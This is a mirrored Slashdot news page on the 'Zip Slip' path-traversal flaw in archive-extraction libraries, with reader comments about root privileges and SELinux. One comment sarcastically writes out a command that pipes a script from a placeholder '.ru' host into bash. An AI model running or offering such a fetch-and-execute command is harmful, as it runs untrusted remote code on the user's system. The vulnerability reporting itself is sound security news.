Slashdot Mirror

← Back to Stories (view on slashdot.org)

Zip Slip Vulnerability Affects Thousands of Projects (theregister.co.uk)

Posted by BeauHD on from the heads-up dept.

Yhcrana writes: Considering the video in the story makes it pretty simple, this is not something I would like to have happen. Apparently it is a flaw in the libraries that are being used by Oracle, Apache, and others. The Register reports: "Booby-trapped archive files can exploit vulnerabilities in a swath of software to overwrite documents and data elsewhere on a computer's file system -- and potentially execute malicious code. Specifically, the flaws, dubbed "Zip Slip" by its discoverers at security outfit Snyk, is a path traversal flaw that can potentially be exploited to perform arbitrary code execution attacks. It affects .zip, .bz2, .tar, .xz, .war, .cpio, and .7z archives.

The bugs, according to Snyk, lie in code that unpacks compressed archives, hence the "Zip Slip" title. When software does not properly check and sanitize file names within the archive, attackers can set the destination path for an unpacked file to an existing folder or file elsewhere on a system. When that file is extracted, it will overwrite the existing data in that same path."

3 of 127 comments (clear)

  1. Re:Holy Moly! This is some seriously creepy sh*t! by Anonymous Coward · · Score: 3, Insightful

    You can't overwrite the userland unless you are root/admin. If you are and you are downloading and extracting random archives before even listing their contents you deserve to have your userland replaced.

    What's next in the security news? `curl https://not-an-exploit.ru/script.sh | bash` being dangerous as root?

  2. Re:Holy Moly! This is some seriously creepy sh*t! by Zontar+The+Mindless · · Score: 4, Insightful

    Or you could simply not decompress archives as root?

    --
    Il n'y a pas de Planet B.
  3. User land == not kernel by raymorris · · Score: 4, Insightful

    User land is everything that's not the kernel.
    All of your personal files? User land.

    I take it you mean:

    Most of the time, you can't overwrite important system files unless:
    1. You're in the administrator group on Windows
    2. You are root on Linux, using a whitelisted program to alter a whitelisted file in a specifically allowed way
    3. You're root and using a 1993 version of Linux
    4. The last time you looked at SELinux was 15 years ago. 15 years ago, it was inconvenient to use, so you've been turning it off ever since.